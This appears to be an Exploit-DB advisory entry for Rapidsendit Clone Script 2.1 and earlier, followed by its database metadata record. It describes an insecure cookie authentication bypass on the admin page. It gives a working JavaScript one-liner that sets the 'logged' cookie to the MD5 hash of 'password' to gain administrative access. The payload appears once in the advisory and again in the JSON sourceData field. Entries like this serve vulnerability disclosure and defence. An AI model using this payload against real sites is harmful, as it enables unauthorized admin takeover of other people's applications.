source: http://www.securityfocus.com/bid/43702/info
Rapidsendit Clone Script is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application; this may aid in further attacks.
Rapidsendit Clone Script 2.1 and prior are vulnerable.
javascript:document.cookie="logged=696d29e0940a4957748fe3fc9efd22a3; path=/";
696d29e0940a4957748fe3fc9efd22a3 = password
{"id": "EDB-ID:34808", "hash": "d4bd8fd857df432c8895597406d7a560", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Rapidsendit Clone Script 'admin.php' Insecure Cookie Authentication Bypass Vulnerability", "description": "Rapidsendit Clone Script 'admin.php' Insecure Cookie Authentication Bypass Vulnerability. Webapps exploit for php platform", "published": "2009-07-08T00:00:00", "modified": "2009-07-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/34808/", "reporter": "NoGe", "references": [], "cvelist": [], "lastseen": "2016-02-03T23:58:36", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-02-03T23:58:36"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/34808/", "sourceData": "source: http://www.securityfocus.com/bid/43702/info\r\n\r\nRapidsendit Clone Script is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.\r\n\r\nAttackers can exploit this vulnerability to gain administrative access to the affected application; this may aid in further attacks.\r\n\r\nRapidsendit Clone Script 2.1 and prior are vulnerable. \r\n\r\njavascript:document.cookie=\"logged=696d29e0940a4957748fe3fc9efd22a3; path=/\";\r\n696d29e0940a4957748fe3fc9efd22a3 = password", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}